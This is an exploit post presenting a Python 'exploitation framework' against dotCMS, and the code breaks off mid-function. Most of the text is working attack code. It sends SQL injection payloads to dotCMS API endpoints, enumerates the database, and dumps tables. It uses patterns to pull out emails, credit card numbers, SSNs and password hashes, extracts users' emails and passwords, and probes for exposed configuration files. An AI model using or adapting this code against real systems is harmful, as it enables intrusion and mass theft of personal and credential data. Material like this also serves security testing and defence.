This tool is designed to proactively identify potential security weaknesses within the dotCMS core, installed plugins, custom code, and server configurations. It automates the detection of common vulnerabilities like XSS, SQL injection, misconfigurations, and outdated components.
The scanner provides actionable insights and detailed reports, empowering developers and administrators to promptly address and remediate identified risks. This feature significantly bolsters the platform's overall security posture, ensuring greater data integrity and compliance for dotCMS users.
=============================================================================================================================================
| # Title : dotCMS v24.04.24 lts v23 Advanced Exploitation Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/dotCMS/core/releases/tag/v24.04.24_lts_v23 |
=============================================================================================================================================
[+] References :
[+] Summary : This Python-based framework is designed for authorized penetration testing of DotCMS applications. It provides a comprehensive exploitation workflow, including:
Evidence Collection: Stores requests, responses, and screenshots in a SQLite database.
Reconnaissance: Checks TLS/SSL, analyzes CORS settings, and asynchronously discovers endpoints.
Vulnerability Assessment: Performs advanced SQL Injection testing (Time-Based, Error-Based, Boolean-Based, Union-Based).
Exploitation: Extracts user data, hunts for JWT tokens, and tests for file inclusion (LFI) vulnerabilities.
Post-Exploitation: Dumps configuration files and identifies sensitive data leaks.
Reporting: Generates detailed penetration testing reports and execution statistics.
[+] Key Features:
Asynchronous and synchronous scanning.
PoC evidence storage and logging.
Supports extraction of users, JWTs, and sensitive configuration files.
Generates professional reports with recommendations.
Legal-use enforcement with explicit authorization confirmation.
[+] Usage : * : Save as: poc.py
Run : python poc.php -t 127.0.0.1
python3 poc.py -t https://demo.dotcms.com --full
# Database Enumeration Only
python3 poc.py -t https://demo.dotcms.com --database
# Quick Scan
python3 poc.py -t https://demo.dotcms.com --quick
[+] POC :
#!/usr/bin/env python3
"""
DotCMS Advanced Exploitation Framework - by indoushka
"""
import os
import sys
import json
import time
import re
import argparse
import hashlib
import base64
import sqlite3
import asyncio
import aiohttp
import ssl
import socket
import csv
from datetime import datetime
from urllib.parse import urljoin, quote, urlparse
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import init, Fore, Style, Back
import warnings
warnings.filterwarnings("ignore")
init(autoreset=True)
class EvidenceCollector:
"""Collects and stores PoC evidence"""
def __init__(self, target):
self.target = target
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
self.evidence_dir = f"evidence_{timestamp}"
os.makedirs(self.evidence_dir, exist_ok=True)
self.evidence_db = f"{self.evidence_dir}/evidence.db"
self.init_database()
def init_database(self):
conn = sqlite3.connect(self.evidence_db)
cursor = conn.cursor()
cursor.execute('''
CREATE TABLE IF NOT EXISTS evidence (
id INTEGER PRIMARY KEY,
timestamp TEXT,
vulnerability TEXT,
endpoint TEXT,
payload TEXT,
request TEXT,
response TEXT,
screenshot_path TEXT,
severity TEXT,
cvss_score REAL,
cwe_id INTEGER,
verified INTEGER DEFAULT 0
)
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS extracted_data (
id INTEGER PRIMARY KEY,
timestamp TEXT,
data_type TEXT,
data_value TEXT,
source TEXT,
hash TEXT
)
''')
conn.commit()
conn.close()
def add_evidence(self, vuln_type, endpoint, payload, request, response, severity="High", cvss=7.5, cwe=None):
conn = sqlite3.connect(self.evidence_db)
cursor = conn.cursor()
screenshot = f"{self.evidence_dir}/{vuln_type}_{datetime.now().strftime('%H%M%S')}.txt"
with open(screenshot, 'w', encoding='utf-8') as f:
f.write(f"REQUEST:\n{request}\n\nRESPONSE:\n{response}")
cursor.execute('''
INSERT INTO evidence
(timestamp, vulnerability, endpoint, payload, request, response, screenshot_path, severity, cvss_score, cwe_id)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
''', (datetime.now().isoformat(), vuln_type, endpoint, payload, request, response,
screenshot, severity, cvss, cwe))
evidence_id = cursor.lastrowid
conn.commit()
conn.close()
print(f"{Fore.GREEN}[+] Evidence recorded (ID: {evidence_id}) for {vuln_type}")
return evidence_id
class DatabaseEnumerator:
"""Advanced database enumeration and dumping"""
def __init__(self, exploiter):
self.exploiter = exploiter
self.db_info = {}
self.tables = []
self.columns = {}
self.data_dumps = {}
def identify_database(self, vulnerable_endpoint):
"""Identify database type and version"""
self.exploiter.log("[*] Identifying database type...", 'info')
identification_payloads = {
'MySQL': ["' AND @@version like '%MySQL%'--", "' AND SLEEP(2)--"],
'PostgreSQL': ["' AND version() like '%PostgreSQL%'--", "' AND pg_sleep(2)--"],
'MSSQL': ["' AND @@version like '%Microsoft%'--", "' AND WAITFOR DELAY '00:00:02'--"],
'Oracle': ["' AND (SELECT banner FROM v$version) like '%Oracle%'--",
"' AND dbms_pipe.receive_message(('a'),2)--"]
}
for db_type, payloads in identification_payloads.items():
for payload in payloads:
try:
start_time = time.time()
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': payload},
timeout=10
)
elapsed = time.time() - start_time
# Time-based detection
if 'sleep' in payload.lower() or 'waitfor' in payload.lower():
if elapsed > 1.5:
self.db_info['type'] = db_type
self.exploiter.log(f"[+] Database identified as: {db_type}", 'success')
break
# Error/response based detection
if db_type == 'MySQL' and 'MySQL' in response.text:
self.db_info['type'] = db_type
break
elif db_type == 'PostgreSQL' and 'PostgreSQL' in response.text:
self.db_info['type'] = db_type
break
elif db_type == 'MSSQL' and 'Microsoft' in response.text:
self.db_info['type'] = db_type
break
except Exception as e:
continue
if 'type' in self.db_info:
break
if 'type' not in self.db_info:
self.exploiter.log("[-] Could not identify database type", 'warning')
self.db_info['type'] = 'Unknown'
# Try to get version
self.get_database_version(vulnerable_endpoint)
return self.db_info
def get_database_version(self, vulnerable_endpoint):
"""Get database version"""
version_payloads = {
'MySQL': "' UNION SELECT @@version,NULL,NULL--",
'PostgreSQL': "' UNION SELECT version(),NULL,NULL--",
'MSSQL': "' UNION SELECT @@version,NULL,NULL--",
'Oracle': "' UNION SELECT banner FROM v$version WHERE rownum=1--"
}
if self.db_info.get('type') in version_payloads:
payload = version_payloads[self.db_info['type']]
try:
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': payload},
timeout=10
)
# Extract version from response
version_patterns = [
r'\d+\.\d+\.\d+',
r'PostgreSQL \d+\.\d+',
r'Microsoft SQL Server \d{4}',
r'Oracle Database \d+g'
]
for pattern in version_patterns:
match = re.search(pattern, response.text)
if match:
self.db_info['version'] = match.group()
self.exploiter.log(f"[+] Database version: {self.db_info['version']}", 'success')
break
except Exception as e:
self.exploiter.log(f"[-] Failed to get version: {str(e)}", 'error')
def enumerate_tables(self, vulnerable_endpoint, limit=50):
"""Enumerate database tables"""
self.exploiter.log(f"[*] Enumerating database tables (limit: {limit})...", 'info')
table_payloads = {
'MySQL': [
f"' UNION SELECT table_name,NULL,NULL FROM information_schema.tables LIMIT {limit}--",
f"' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables LIMIT {limit}--"
],
'PostgreSQL': [
f"' UNION SELECT tablename,NULL,NULL FROM pg_tables LIMIT {limit}--",
f"' UNION SELECT schemaname,tablename,NULL FROM pg_tables LIMIT {limit}--"
],
'MSSQL': [
f"' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
f"' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables--"
]
}
tables = []
if self.db_info.get('type') in table_payloads:
for payload in table_payloads[self.db_info['type']][:2]:
try:
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': payload},
timeout=15
)
# Extract table names - looking for patterns
table_patterns = [
r'[a-zA-Z_][a-zA-Z0-9_]*',
r'user[s_]?', r'admin[s_]?', r'passw(or)?d', r'credit', r'account',
r'customer', r'client', r'order', r'transaction', r'payment',
r'config', r'setting', r'log', r'audit', r'session',
r'token', r'api', r'key', r'secret'
]
# Find potential table names
for pattern in table_patterns:
matches = re.findall(pattern, response.text, re.IGNORECASE)
for match in matches:
if len(match) > 3 and match.lower() not in ['null', 'select', 'union', 'from']:
if match not in tables:
tables.append(match)
if len(tables) >= limit:
break
if len(tables) >= limit:
break
if tables:
break
except Exception as e:
self.exploiter.log(f"[-] Table enumeration failed: {str(e)}", 'error')
# Clean and deduplicate
tables = list(set([t for t in tables if isinstance(t, str)]))
tables.sort()
self.tables = tables[:limit]
if self.tables:
self.exploiter.log(f"[+] Found {len(self.tables)} potential tables:", 'success')
for i, table in enumerate(self.tables[:20], 1):
self.exploiter.log(f" {i:2}. {table}", 'success')
# Save tables list
with open(f"{self.exploiter.results_dir}/database_tables.json", 'w') as f:
json.dump(self.tables, f, indent=2)
return self.tables
def enumerate_columns(self, vulnerable_endpoint, table_name):
"""Enumerate columns for a specific table"""
self.exploiter.log(f"[*] Enumerating columns for table: {table_name}", 'info')
column_payloads = {
'MySQL': [
f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--",
f"' UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}'--"
],
'PostgreSQL': [
f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--",
f"' UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}'--"
],
'MSSQL': [
f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--"
]
}
columns = []
if self.db_info.get('type') in column_payloads:
for payload in column_payloads[self.db_info['type']][:2]:
try:
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': payload},
timeout=15
)
# Look for column name patterns
column_patterns = [
r'[a-zA-Z_][a-zA-Z0-9_]*',
r'user', r'pass', r'email', r'name', r'address',
r'phone', r'credit', r'card', r'account',
r'token', r'session', r'key', r'secret',
r'salary', r'price', r'amount', r'balance',
r'birth', r'ssn', r'social', r'security',
r'ip', r'mac', r'device', r'browser'
]
for pattern in column_patterns:
matches = re.findall(pattern, response.text, re.IGNORECASE)
for match in matches:
if len(match) > 2 and match.lower() not in ['null', 'select', 'union', 'from', 'where']:
if match not in columns:
columns.append(match)
if columns:
break
except Exception as e:
self.exploiter.log(f"[-] Column enumeration failed: {str(e)}", 'error')
# Clean and deduplicate
columns = list(set([c for c in columns if isinstance(c, str)]))
columns.sort()
self.columns[table_name] = columns
if columns:
self.exploiter.log(f"[+] Found {len(columns)} potential columns for {table_name}:", 'success')
for i, col in enumerate(columns[:15], 1):
self.exploiter.log(f" {i:2}. {col}", 'success')
return columns
def dump_table_data(self, vulnerable_endpoint, table_name, columns=None, limit=100):
"""Dump data from specific table"""
self.exploiter.log(f"[*] Dumping data from table: {table_name} (limit: {limit})", 'info')
if not columns and table_name in self.columns:
columns = self.columns[table_name]
if not columns:
self.exploiter.log(f"[-] No columns found for table {table_name}", 'warning')
columns = ['*']
# Build column string
if columns == ['*']:
col_string = '*'
else:
# Take first 5 columns for initial dump
col_string = ','.join(columns[:5])
dump_payloads = {
'MySQL': [
f"' UNION SELECT {col_string} FROM {table_name} LIMIT {limit}--",
f"' UNION SELECT CONCAT_WS('|',{col_string}) FROM {table_name} LIMIT {limit}--"
],
'PostgreSQL': [
f"' UNION SELECT {col_string} FROM {table_name} LIMIT {limit}--",
f"' UNION SELECT {col_string}||'|' FROM {table_name} LIMIT {limit}--"
],
'MSSQL': [
f"' UNION SELECT {col_string} FROM {table_name}--",
f"' UNION SELECT {col_string}+'|' FROM {table_name}--"
]
}
dumped_data = []
if self.db_info.get('type') in dump_payloads:
for payload in dump_payloads[self.db_info['type']][:2]:
try:
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': payload},
timeout=20
)
# Extract data - look for structured patterns
data_patterns = [
# Email patterns
r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
# Phone numbers
r'[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}',
# Credit cards
r'\b(?:\d[ -]*?){13,16}\b',
# Dates
r'\d{1,2}[/-]\d{1,2}[/-]\d{2,4}',
# URLs
r'https?://[^\s<>"\']+',
# IP addresses
r'\b(?:\d{1,3}\.){3}\d{1,3}\b',
# Social security
r'\d{3}-\d{2}-\d{4}',
# Passwords/Hashes
r'\$2[ay]\$\d+\$[a-zA-Z0-9./]+', # bcrypt
r'[a-fA-F0-9]{32}', # MD5
r'[a-fA-F0-9]{40}', # SHA1
r'[a-fA-F0-9]{64}', # SHA256
]
# Also look for pipe-separated data (common in dumps)
lines = response.text.split('\n')
for line in lines:
if '|' in line and len(line.strip()) > 5:
parts = line.split('|')
if len(parts) >= len(columns[:5]):
record = {}
for i, part in enumerate(parts[:len(columns[:5])]):
if i < len(columns[:5]):
record[columns[i] if i < len(columns) else f'col_{i}'] = part.strip()
if record:
dumped_data.append(record)
# Look for patterns
for pattern in data_patterns:
matches = re.findall(pattern, line)
for match in matches:
if len(match) > 3:
if not any(match in str(d) for d in dumped_data):
dumped_data.append({'extracted_data': match, 'source': line[:50]})
if dumped_data:
break
except Exception as e:
self.exploiter.log(f"[-] Data dump failed: {str(e)}", 'error')
# Save dumped data
if dumped_data:
self.data_dumps[table_name] = dumped_data[:limit]
# Save to JSON
json_file = f"{self.exploiter.results_dir}/dump_{table_name}.json"
with open(json_file, 'w', encoding='utf-8') as f:
json.dump(dumped_data, f, indent=2, default=str)
# Save to CSV if structured data
csv_file = f"{self.exploiter.results_dir}/dump_{table_name}.csv"
try:
if all(isinstance(d, dict) for d in dumped_data):
keys = set()
for record in dumped_data:
keys.update(record.keys())
with open(csv_file, 'w', newline='', encoding='utf-8') as f:
writer = csv.DictWriter(f, fieldnames=list(keys))
writer.writeheader()
writer.writerows(dumped_data)
except:
pass
self.exploiter.log(f"[+] Dumped {len(dumped_data)} records from {table_name}", 'success')
self.exploiter.log(f"[+] Data saved to: {json_file}", 'success')
# Display sample
self.exploiter.log(f"[*] Sample data from {table_name}:", 'info')
for i, record in enumerate(dumped_data[:3], 1):
self.exploiter.log(f" Record {i}: {str(record)[:100]}...", 'info')
return dumped_data
def search_cleartext_data(self, vulnerable_endpoint, search_terms=None):
"""Search for cleartext sensitive data across database"""
self.exploiter.log("[*] Searching for cleartext sensitive data...", 'info')
if not search_terms:
search_terms = [
'password', 'passwd', 'pwd', 'secret', 'token', 'key',
'credit', 'card', 'account', 'ssn', 'social', 'security',
'salary', 'income', 'balance', 'address', 'phone',
'email', 'username', 'login', 'admin', 'root'
]
found_data = {}
for term in search_terms:
self.exploiter.log(f"[*] Searching for: {term}", 'info')
search_payloads = {
'MySQL': [
f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--",
f"' UNION SELECT CONCAT(table_name,'.',column_name),NULL,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--"
],
'PostgreSQL': [
f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--"
],
'MSSQL': [
f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--"
]
}
if self.db_info.get('type') in search_payloads:
for payload in search_payloads[self.db_info['type']][:2]:
try:
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': payload},
timeout=15
)
# Look for table.column patterns
patterns = [
rf'{term}',
rf'[a-zA-Z_][a-zA-Z0-9_]*{term}[a-zA-Z0-9_]*',
rf'[a-zA-Z_][a-zA-Z0-9_]*\.{term}[a-zA-Z0-9_]*'
]
for pattern in patterns:
matches = re.findall(pattern, response.text, re.IGNORECASE)
for match in matches:
if match not in found_data:
found_data[match] = term
if term in found_data:
break
except Exception as e:
continue
# Try to extract actual data from found columns
extracted_cleartext = {}
for column_ref in found_data.keys():
if '.' in column_ref:
table, column = column_ref.split('.', 1)
# Try to extract data from this column
extract_payload = {
'MySQL': f"' UNION SELECT {column} FROM {table} LIMIT 10--",
'PostgreSQL': f"' UNION SELECT {column} FROM {table} LIMIT 10--",
'MSSQL': f"' UNION SELECT {column} FROM {table}--"
}
if self.db_info.get('type') in extract_payload:
try:
response = self.exploiter.session.get(
urljoin(self.exploiter.target, vulnerable_endpoint),
params={'filter': extract_payload[self.db_info['type']]},
timeout=15
)
# Look for non-hash, non-null values
lines = response.text.split('\n')
for line in lines:
line = line.strip()
if (len(line) > 3 and
len(line) < 100 and
not line.startswith('$2') and # Not bcrypt
not re.match(r'^[a-fA-F0-9]{32,128}$', line)): # Not hash
if column not in extracted_cleartext:
extracted_cleartext[column] = []
if line not in extracted_cleartext[column]:
extracted_cleartext[column].append(line)
except Exception as e:
continue
# Save results
if found_data or extracted_cleartext:
results = {
'sensitive_columns': found_data,
'cleartext_data': extracted_cleartext
}
results_file = f"{self.exploiter.results_dir}/cleartext_search.json"
with open(results_file, 'w', encoding='utf-8') as f:
json.dump(results, f, indent=2)
# Display findings
if found_data:
self.exploiter.log("[+] Found sensitive columns:", 'success')
for col in list(found_data.keys())[:10]:
self.exploiter.log(f" ? {col}", 'success')
if extracted_cleartext:
self.exploiter.log("[+] Found cleartext data:", 'success')
for col, data in extracted_cleartext.items():
self.exploiter.log(f" ? {col}: {data[:3]}...", 'success')
return found_data, extracted_cleartext
def comprehensive_database_dump(self, vulnerable_endpoint):
"""Perform comprehensive database dump"""
self.exploiter.log("\n" + "="*80, 'info')
self.exploiter.log("COMPREHENSIVE DATABASE DUMP", 'section')
self.exploiter.log("="*80, 'info')
# Step 1: Identify database
db_info = self.identify_database(vulnerable_endpoint)
# Step 2: Enumerate tables
tables = self.enumerate_tables(vulnerable_endpoint, limit=30)
# Step 3: For each interesting table, enumerate columns and dump data
interesting_tables = []
interesting_patterns = [
'user', 'admin', 'pass', 'account', 'customer',
'client', 'order', 'payment', 'credit', 'card',
'config', 'setting', 'token', 'session', 'log'
]
for table in tables:
for pattern in interesting_patterns:
if pattern in table.lower():
interesting_tables.append(table)
break
# Also take some random tables if not enough interesting ones
if len(interesting_tables) < 5 and len(tables) > 5:
interesting_tables.extend([t for t in tables if t not in interesting_tables][:5])
# Step 4: Dump data from interesting tables
all_dumped_data = {}
for table in interesting_tables[:10]: # Limit to 10 tables
try:
# Enumerate columns
columns = self.enumerate_columns(vulnerable_endpoint, table)
# Dump data
if columns:
data = self.dump_table_data(vulnerable_endpoint, table, columns, limit=50)
if data:
all_dumped_data[table] = data
time.sleep(1) # Rate limiting
except Exception as e:
self.exploiter.log(f"[-] Failed to dump {table}: {str(e)}", 'error')
# Step 5: Search for cleartext data
sensitive_cols, cleartext_data = self.search_cleartext_data(vulnerable_endpoint)
# Step 6: Generate database report
self.generate_database_report(db_info, tables, all_dumped_data, sensitive_cols, cleartext_data)
return {
'database_info': db_info,
'tables': tables,
'dumped_data': all_dumped_data,
'sensitive_columns': sensitive_cols,
'cleartext_data': cleartext_data
}
def generate_database_report(self, db_info, tables, dumped_data, sensitive_cols, cleartext_data):
"""Generate comprehensive database report"""
report = f"""
{'='*80}
DATABASE PENETRATION TEST REPORT
{'='*80}
Database Type: {db_info.get('type', 'Unknown')}
Database Version: {db_info.get('version', 'Unknown')}
Total Tables Found: {len(tables)}
Tables Dumped: {len(dumped_data)}
Sensitive Columns: {len(sensitive_cols)}
Cleartext Data Found: {sum(len(v) for v in cleartext_data.values())}
TABLE ENUMERATION
{'-'*80}
"""
for i, table in enumerate(tables[:50], 1):
report += f"{i:3}. {table}\n"
report += f"""
DATA DUMP SUMMARY
{'-'*80}
"""
for table, data in dumped_data.items():
report += f"\n{table}:\n"
report += f" Records dumped: {len(data)}\n"
if data and isinstance(data[0], dict):
sample_keys = list(data[0].keys())[:3]
report += f" Sample columns: {', '.join(sample_keys)}\n"
# Show sample data
if data:
report += f" Sample record: {str(data[0])[:100]}...\n"
report += f"""
SENSITIVE COLUMNS FOUND
{'-'*80}
"""
for col, term in list(sensitive_cols.items())[:20]:
report += f"? {col} (contains: {term})\n"
report += f"""
CLEARTEXT DATA DISCOVERED
{'-'*80}
"""
for column, values in cleartext_data.items():
report += f"\n{column}:\n"
for value in values[:5]:
report += f" ? {value}\n"
if len(values) > 5:
report += f" ... and {len(values) - 5} more\n"
report += f"""
SECURITY FINDINGS
{'-'*80}
1. Database exposed via SQL injection
2. {len(sensitive_cols)} sensitive columns identified
3. {sum(len(v) for v in cleartext_data.values())} cleartext sensitive values found
4. {len(dumped_data)} tables successfully dumped
RECOMMENDATIONS
{'-'*80}
1. Immediate patch of SQL injection vulnerabilities
2. Encrypt all sensitive data at rest
3. Implement proper access controls to database
4. Conduct security audit of all database queries
5. Implement database activity monitoring
6. Rotate all exposed credentials immediately
{'='*80}
END OF DATABASE REPORT
{'='*80}
"""
report_file = f"{self.exploiter.results_dir}/database_penetration_report.txt"
with open(report_file, 'w', encoding='utf-8') as f:
f.write(report)
self.exploiter.log(f"[+] Database report generated: {report_file}", 'success')
# Also save comprehensive JSON
comprehensive_data = {
'database_info': db_info,
'all_tables': tables,
'dumped_tables': list(dumped_data.keys()),
'sensitive_columns': sensitive_cols,
'cleartext_data': cleartext_data,
'dump_summary': {table: len(data) for table, data in dumped_data.items()}
}
json_file = f"{self.exploiter.results_dir}/database_comprehensive.json"
with open(json_file, 'w', encoding='utf-8') as f:
json.dump(comprehensive_data, f, indent=2)
return report
# ????? ???? ????? ??? ???? DotCMSExploiter ???????
class DotCMSExploiter:
"""Main exploitation class - Enhanced with Database Enumeration"""
def __init__(self, target):
self.target = target.rstrip('/')
self.evidence = EvidenceCollector(target)
self.db_enumerator = DatabaseEnumerator(self) # Initialize DB enumerator
# Statistics
self.stats = {
'vulnerabilities': 0,
'users_extracted': 0,
'tokens_found': 0,
'databases_found': 0,
'files_leaked': 0,
'tables_enumerated': 0,
'records_dumped': 0
}
# Create results directory
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
self.results_dir = f"results_{timestamp}"
os.makedirs(self.results_dir, exist_ok=True)
# Setup session
import requests
self.session = requests.Session()
self.session.verify = False
self.session.timeout = 30
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
# Suppress warnings
import urllib3
urllib3.disable_warnings()
print(f"{Fore.CYAN}{'='*80}")
print(f"{Fore.YELLOW} DotCMS Advanced Exploitation Framework")
print(f"{Fore.YELLOW} Enhanced with Database Enumeration")
print(f"{Fore.CYAN}{'='*80}{Style.RESET_ALL}")
def log(self, message, level='info'):
"""Log with colors"""
timestamp = datetime.now().strftime('%H:%M:%S')
colors = {
'success': Fore.GREEN + Style.BRIGHT,
'error': Fore.RED + Style.BRIGHT,
'warning': Fore.YELLOW + Style.BRIGHT,
'info': Fore.CYAN,
'critical': Fore.RED + Back.WHITE + Style.BRIGHT,
'debug': Fore.LIGHTBLACK_EX,
'section': Fore.MAGENTA + Style.BRIGHT,
}
color = colors.get(level, Fore.RESET)
print(f"{color}[{timestamp}] {message}{Style.RESET_ALL}")
# Log to file
with open(f"{self.results_dir}/execution.log", 'a', encoding='utf-8') as f:
f.write(f"[{timestamp}] {message}\n")
def check_tls(self):
"""Check TLS/SSL configuration"""
self.log("[*] Checking TLS/SSL configuration...", 'info')
try:
parsed = urlparse(self.target)
hostname = parsed.hostname
port = parsed.port or 443
context = ssl.create_default_context()
with socket.create_connection((hostname, port), timeout=10) as sock:
with context.wrap_socket(sock, server_hostname=hostname) as ssock:
cert = ssock.getpeercert()
# Check certificate expiry
if 'notAfter' in cert:
expires = datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z')
days_to_expire = (expires - datetime.now()).days
if days_to_expire < 30:
self.log(f"[-] Certificate expires in {days_to_expire} days", 'warning')
else:
self.log(f"[+] Certificate valid for {days_to_expire} days", 'success')
# Get SSL/TLS version
ssl_version = ssock.version()
self.log(f"[+] SSL/TLS Version: {ssl_version}", 'success')
except Exception as e:
self.log(f"[-] TLS check failed: {str(e)}", 'error')
def cors_analysis(self):
"""Analyze CORS configuration"""
self.log("[*] Analyzing CORS configuration...", 'info')
test_origins = [
'https://evil.com',
'http://evil.com',
'null',
self.target.replace('https://', 'http://'),
]
vulnerable = False
for origin in test_origins:
headers = {'Origin': origin}
try:
response = self.session.get(self.target, headers=headers, timeout=10)
if 'Access-Control-Allow-Origin' in response.headers:
allowed_origin = response.headers['Access-Control-Allow-Origin']
if allowed_origin == origin or allowed_origin == '*':
self.log(f"[!] CORS Misconfiguration: {allowed_origin}", 'warning')
vulnerable = True
if 'Access-Control-Allow-Credentials' in response.headers:
if response.headers['Access-Control-Allow-Credentials'].lower() == 'true':
self.log(f"[!] CORS with credentials allowed!", 'critical')
except Exception as e:
pass
if not vulnerable:
self.log("[+] CORS properly configured", 'success')
async def async_discovery(self):
"""Asynchronous discovery of endpoints"""
self.log("[*] Starting asynchronous discovery...", 'info')
# Common DotCMS endpoints
endpoints = [
'/api/v1/contenttype',
'/api/v1/workflow',
'/api/v1/sites',
'/api/v1/users',
'/api/v1/authentication',
'/dotAdmin/',
'/admin/',
'/html/portlet/',
'/c/',
'/application/',
'/.env',
'/config.json',
'/web.config',
'/dotcms-config.xml'
]
async def check_endpoint(session, endpoint):
url = urljoin(self.target, endpoint)
try:
async with session.get(url, timeout=10, ssl=False) as response:
return {
'endpoint': endpoint,
'status': response.status,
'url': str(response.url)
}
except Exception as e:
return {
'endpoint': endpoint,
'status': 0,
'error': str(e)
}
connector = aiohttp.TCPConnector(ssl=False)
timeout = aiohttp.ClientTimeout(total=30)
async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
tasks = [check_endpoint(session, endpoint) for endpoint in endpoints]
results = await asyncio.gather(*tasks)
discovered = []
for result in results:
if isinstance(result, dict) and result.get('status', 0) in [200, 301, 302, 403]:
discovered.append(result)
self.log(f"[+] Discovered {len(discovered)} accessible endpoints", 'success')
return discovered
def enhanced_sqli_testing(self):
"""Enhanced SQL injection testing"""
self.log("\n[*] Starting enhanced SQL injection testing...", 'info')
endpoints = [
'/api/v1/contenttype',
'/api/v1/workflow',
'/api/v1/sites',
'/dotAdmin/personalization'
]
# Advanced payloads
payloads = {
'Time-Based': [
"' AND (SELECT pg_sleep(5))--",
"' AND SLEEP(5)--",
"' WAITFOR DELAY '00:00:05'--",
"' AND 1234=(SELECT 1234 FROM PG_SLEEP(5))--"
],
'Error-Based': [
"' AND (SELECT cast((SELECT 'test') as int))--",
"' AND extractvalue(1, concat(0x7e, version()))--",
"' AND 1=CONVERT(int, @@version)--"
],
'Boolean-Based': [
"' AND '1'='1",
"' AND '1'='2",
"' OR '1'='1"
],
'Union-Based': [
"' UNION SELECT NULL,NULL,NULL--",
"' UNION SELECT 1,2,3--",
"' UNION SELECT @@version,user(),database()--"
]
}
vulnerabilities = []
for endpoint in endpoints:
self.log(f"[*] Testing endpoint: {endpoint}", 'info')
url = urljoin(self.target, endpoint)
# First get baseline
try:
baseline = self.session.get(url, timeout=10)
baseline_length = len(baseline.text)
except:
baseline_length = 0
for category, category_payloads in payloads.items():
for payload in category_payloads[:3]: # Test first 3 of each category
try:
start_time = time.time()
response = self.session.get(
url,
params={'filter': payload},
timeout=15
)
elapsed = time.time() - start_time
# Time-Based detection
if category == 'Time-Based' and elapsed > 4:
self.log(f"[!] Time-Based SQLi detected on {endpoint}", 'critical')
vulnerabilities.append({
'endpoint': endpoint,
'type': category,
'payload': payload,
'delay': round(elapsed, 2),
'status': response.status_code
})
evidence_id = self.evidence.add_evidence(
f'SQL_Injection_{category}',
endpoint,
payload,
f"GET {url}?filter={quote(payload)}",
response.text[:1000],
severity="Critical",
cvss=9.0,
cwe=89
)
self.stats['vulnerabilities'] += 1
break
# Error-Based detection
error_indicators = [
'SQL syntax', 'mysql_fetch', 'pg_', 'ORA-',
'Microsoft OLE DB', 'Unclosed quotation',
'You have an error in your SQL syntax'
]
if any(indicator.lower() in response.text.lower() for indicator in error_indicators):
self.log(f"[!] Error-Based SQLi detected on {endpoint}", 'critical')
vulnerabilities.append({
'endpoint': endpoint,
'type': category,
'payload': payload,
'status': response.status_code
})
evidence_id = self.evidence.add_evidence(
f'SQL_Injection_{category}',
endpoint,
payload,
f"GET {url}?filter={quote(payload)}",
response.text[:1000],
severity="Critical",
cvss=9.0,
cwe=89
)
self.stats['vulnerabilities'] += 1
break
# Boolean-Based detection
if category == 'Boolean-Based':
test_length = len(response.text)
if abs(baseline_length - test_length) > 200:
self.log(f"[!] Boolean-Based SQLi suspected on {endpoint}", 'warning')
vulnerabilities.append({
'endpoint': endpoint,
'type': category,
'payload': payload,
'length_diff': abs(baseline_length - test_length)
})
except Exception as e:
continue
return vulnerabilities
def extract_users_comprehensive(self, vulnerable_endpoint=None):
"""Comprehensive user extraction"""
self.log("\n[*] Starting comprehensive user extraction...", 'info')
# If no endpoint provided, try common ones
if not vulnerable_endpoint:
endpoints_to_try = ['/api/v1/contenttype', '/api/v1/sites']
else:
endpoints_to_try = [vulnerable_endpoint]
users = []
for endpoint in endpoints_to_try:
try:
# Try to get version first
version_payload = "' AND (SELECT substring(version() from 1 for 1))='P'--"
response = self.session.get(
urljoin(self.target, endpoint),
params={'filter': version_payload},
timeout=10
)
# Simple extraction attempt
extract_payload = "' UNION SELECT NULL,emailaddress,password_ FROM user_ LIMIT 5--"
response = self.session.get(
urljoin(self.target, endpoint),
params={'filter': extract_payload},
timeout=10
)
# Look for email patterns in response
email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
hash_pattern = r'\$2[ay]\$\d+\$[a-zA-Z0-9./]+'
emails = re.findall(email_pattern, response.text)
